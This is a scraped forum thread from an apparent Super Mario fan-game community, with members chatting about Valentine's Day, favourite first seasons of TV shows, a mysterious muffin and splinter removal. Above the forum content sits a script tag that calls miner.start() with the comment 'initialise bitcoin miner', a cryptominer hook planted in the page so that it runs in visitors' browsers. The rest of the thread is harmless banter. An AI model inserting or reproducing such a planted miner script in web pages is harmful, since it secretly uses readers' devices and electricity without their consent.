<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralpge project

The Twitter Thread or Something

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
Ashan
The world has become a place

Re: biggie > tupac

Postby Ashan » 2 years ago

Jayoshi wrote:I bought two chocolate bars for a girl I like. She not only accepted it, but gave me some chocolate back as well! I'm glad she was able to be my Valentine today. :)
Well, both of you just broke even on chocolate in the end. If you really wanted to win, you should have given her slightly less chocolate than she gave you, and you'd make a small profit.

Ashan

I spent my Valentine's day walking around like C3PO because my buddy took me to the gym to lift weights a couple days ago which I don't normally do. Yesterday wasn't that bad but today I can barely move.

I also have a potentially scary midterm tomorrow so I was not at all focused on the holiday.

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 2 years ago

Valentine's Day means little to me.

I've never had a girlfriend.

Like. Ever.

All right, so I had one like, *very* briefly.

When I was about... 13.

I'm 34 now.

Still haven't had another.

:cry:
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

🦆 RedMageSusie
Dancing with the moonlit knight

Postby RedMageSusie » 2 years ago

I went out drinking at a game bar. No regrets.

nothobz
of the jungle
First name: george

Postby nothobz » 2 years ago

i spent valentines day the sam way i spend all days ;)

Bean

Postby Bean » 2 years ago

I sort of asked this to myself on Twitter, but I'll ask it here. How many long-running shows can you name where you find the first season to be the best? Only brought it up because of MacGyver of all things, the '80s one and not the reboot I haven't paid any attention to. Usually, shows in their first seasons are finding their feet, but this one's pretty decent with the cool nerd saving the day routine. There were a couple of duds, and a decent amount of mixed bags, but I wound up enjoying over half of the episodes.

Most shows are usually best in their middle seasons after the characters have been established, and sometimes the later seasons can be the best when the characters become more caricatures and go over the top, but it's rare to see a first season be the most fun to watch.

Mikkofier
What about Ron magic?
First name: Mikko J. Fuzzygrumbles
Pronouns: he/him/his

Postby Mikkofier » 2 years ago

Didn't even notice it was Valentine's day yesterday. Oh well.
Many people need desperately to receive this message: I feel and think much as you do, care about many of the things you care about, although most people do not care about them. You are not alone.
-Kurt Vonnegut
Context-free Supper Mario Broth Roulette! NOTE: Potential Jumpscare warning!
Avatar source (for most of them).

Ashan

Bean wrote:I sort of asked this to myself on Twitter, but I'll ask it here. How many long-running shows can you name where you find the first season to be the best? Only brought it up because of MacGyver of all things, the '80s one and not the reboot I haven't paid any attention to. Usually, shows in their first seasons are finding their feet, but this one's pretty decent with the cool nerd saving the day routine. There were a couple of duds, and a decent amount of mixed bags, but I wound up enjoying over half of the episodes.

Most shows are usually best in their middle seasons after the characters have been established, and sometimes the later seasons can be the best when the characters become more caricatures and go over the top, but it's rare to see a first season be the most fun to watch.
I think the American version of The Office got increasingly worse as it went on. It's kinda hard to compare the first 2 seasons because the first one felt much more similar to the UK version and was also only 6 episodes compared to the 20+ standard of later seasons, and for the first like 3 seasons it was still pretty good but then they increasingly starting jumping bigger and bigger sharks. So I don't know if I'd say the first is the best but it could be argued I'm sure.

Bean

Postby Bean » 2 years ago

Yeah, there are some shows I can think of where the first season is good like Roseanne, NCIS, or even Star Trek: Voyager, but I think all of those have a better season at some point later on. I never watched The Office, but it's sounding like you're putting it in that same company.

It's not like this is as meant as a slight unless the show literally jumps the shark after the first season, but shows like that don't usually go on for five years or more to begin with. It was just one of those things I was thinking about and wanted to know if there's a show like that for you all out there.

Coryman
The road to nowhere leads to me
First name: Cory

Postby Coryman » 2 years ago

For valentine's day this year...
I didn't eat a single piece of chocolate or candy
Talked to only two females, one of whom is my mom and the other might as well be my sister
Spent more time than I'd like to admit alone listening to Rush

So yeah I'd call that a productive day!
raocow wrote: In a world where shag carpeting wins a fight against a helicopter, we spend a lot of time reading and comparing numbers.

TheFinalSentinel
Low rates,%Percent%signs%, I dunno
First name: £ٌœ'ƒھ‡ح¼円Qف-‹";ôىù♪ïظ§»ھ

Postby TheFinalSentinel » 2 years ago

Coryman wrote:Spent more time than I'd like to admit alone listening to Rush

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 2 years ago

Feeling great my first day here in Michigan :3 I have food, internet, a stress free home, and a really sweet kitty
That crazy voice dude

🦆 RedMageSusie
Dancing with the moonlit knight

Postby RedMageSusie » 2 years ago

Glad to hear that :D

TheFinalSentinel
Low rates,%Percent%signs%, I dunno
First name: £ٌœ'ƒھ‡ح¼円Qف-‹";ôىù♪ïظ§»ھ

Postby TheFinalSentinel » 2 years ago

InsaneIntentions1 wrote:Feeling great my first day here in Michigan :3 I have food, internet, a stress free home, and a really sweet kitty
Keep it up, Skullomania. Image

ParmaJon
Moose in a suit
First name: Jon (a bit too obvious?)

Postby ParmaJon » 2 years ago

Im eating a muffin right now and have no idea what kind it is. It has an orangish brownish colored stuff on the inside but i cant tell what it is.
Go to bed

UnclePutte
Potatoes do their best now and are preparing. Please wait warmly until it is ready
First name: Putte

Postby UnclePutte » 2 years ago

ParmaJon wrote:Im eating a muffin right now and have no idea what kind it is. It has an orangish brownish colored stuff on the inside but i cant tell what it is.
Kebab and paint thinner relish muffin. They're real popular these days.

ParmaJon
Moose in a suit
First name: Jon (a bit too obvious?)

Postby ParmaJon » 2 years ago

UnclePutte wrote:
ParmaJon wrote:Im eating a muffin right now and have no idea what kind it is. It has an orangish brownish colored stuff on the inside but i cant tell what it is.
Kebab and paint thinner relish muffin. They're real popular these days.
Well, that explains why I feel kinda light headed, although I think I only ate one of the kebab sticks and not both of them. Thanks for solving the mystery!
Go to bed

idol
god's gonna come to my house and kill me
First name: charlotte
Pronouns: she/her

Postby idol » 2 years ago

im gonna take so much blood thinner medication that my blood becomes so thin it can cut through time
must b love on tha brain
[avi source]

Ivy

Postby Ivy » 2 years ago

🅱iggie 🅱heeze
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

Coryman
The road to nowhere leads to me
First name: Cory

Postby Coryman » 2 years ago

I have a series lack of objects sharp enough to cut through my skin in a controlled manner (rather than with force like a steak knife).
This is a problem because I need to remove a fully submerged sliver, so far nail clippers are the best choice somehow?
raocow wrote: In a world where shag carpeting wins a fight against a helicopter, we spend a lot of time reading and comparing numbers.

Ivy

Postby Ivy » 2 years ago

Coryman wrote:I have a series lack of objects sharp enough to cut through my skin in a controlled manner (rather than with force like a steak knife).
This is a problem because I need to remove a fully submerged sliver, so far nail clippers are the best choice somehow?
i don't remember the last time I had a splinter but I hear tweezers are the tool of choice here, and don't involve incisions.
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

nothobz
of the jungle
First name: george

Postby nothobz » 2 years ago

one time i got a metal sliver and it hurt a lot more than a wood splinter but anyways as i was saying i wanted to leave it in my finger for the rest of my life you know hey look at this metal in my hand i'd say (to people) and then it rusted and either fell out or i took it out or it disintegrated but it turned green and was no longer cool

if your teeth are real i'd bite it out

BurntTenda
defeat four ducks

Postby BurntTenda » 2 years ago

nothobz wrote:one time i got a metal sliver and it hurt a lot more than a wood splinter but anyways as i was saying i wanted to leave it in my finger for the rest of my life you know hey look at this metal in my hand i'd say (to people) and then it rusted and either fell out or i took it out or it disintegrated but it turned green and was no longer cool
I don't think keeping a metal silver in your hand is particularly healthy.
I'm not a doctor, though...

I remember one time I had a splinter, had no idea it was there, and then it became infected and the skin there was green.
And then after getting rid of the infected area, there ended up being a green finger nail trying to grow inward.
Something goes here sometime.

onpon4
Sharing is good.
First name: Julie

Postby onpon4 » 2 years ago

BurntTenda wrote:I don't think keeping a metal silver in your hand is particularly healthy.
That would depend on what kind of metal it is, wouldn't it? ;) After all, wearing earrings isn't dangerous. But you'd have to be an idiot to wear earrings made of lead. (And it would turn you into an even bigger idiot.)

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 2 years ago

Looking through the MaGL X3 showrunner application thread, there's a lot of people worried about a saturation of contests. But honestly, I think it's so cool that SMBX has grown in popularity so much that there's always a contest open, always an opportunity to design competitively.
onpon4 wrote:After all, wearing earrings isn't dangerous.
keeping an earring on permanently is probably pretty dangerous. nobody i've heard of leaves jewelry in their piercings for long periods of time like that

Return to “the gazebo”